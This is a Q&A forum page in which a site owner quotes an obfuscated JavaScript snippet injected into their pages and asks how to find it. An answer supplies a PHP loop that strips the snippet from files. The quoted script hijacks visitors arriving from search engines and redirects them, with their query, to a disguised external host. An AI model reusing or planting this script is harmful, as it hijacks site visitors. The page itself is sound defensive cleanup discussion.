Home/ Questions/Q 7863531
In Process

The Archive Base Latest Questions

Editorial Team
  • 0
Asked: 2026-06-02T23:30:41+00:00

My sites have been marked as a Reported Attack Page! in Firefox. Here is

  • 0

My sites have been marked as a Reported Attack Page! in Firefox.

Here is the suspicious code in question:

<script language="JavaScript">eval(function(p,a,c,k,e,r){e=f
unction(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?Strin
g.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,Str
ing)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e
]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.re
place(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('e r=
x.9,t="",q;4(r.3("m.")!=-1)t="q";4(r.3("7.")!=-1)t="q";4(r.3
("8.")!=-1)t="p";4(r.3("a.")!=-1)t="q";4(r.3("f.")!=-1)t="g"
;4(r.3("j.")!=-1)t="q";4(t.6&&((q=r.3("?"+t+"="))!=-1||(q=r.
3("&"+t+"="))!=-1))B.C="v"+"w"+":/"+"/A"+"b"+"k"+"5"+"h."+"c
"+"z/s"+"u"+"5"+"h.p"+"d?"+"t"+"y=1&t"+"i"+"l="+r.n(q+2+t.6)
.o("&")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referr
er|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|s
ubstring|split||||||ea|ht|tp|document|||go|window|location'.
split('|'),0,{}))</script>

I want to write some PHP code to traverse the folders in the site path and fetch the files in each folder. For each file, I will open it and check if it contain the above code using regular expressions.

Is this good idea, or what should I do here?

Share

Leave an answer

You must login to add an answer.

Need An Account,

1 Answer

  1. Editorial Team

    You just need to do some string replacement, since you know exactly what you’re looking for. Something like this should work (You may need to adjust the call to glob depending on where you invoke this script.

    <?php

$js = 'INSERT THE CODE FROM YOUR POST HERE';
foreach( glob("*") as $filename) {
    $contents = file_get_contents( $filename);
    $contents = str_replace( $js, '', $contents); // Replace the code with nothing
    file_put_contents( $filename, $contents);
}
    • 0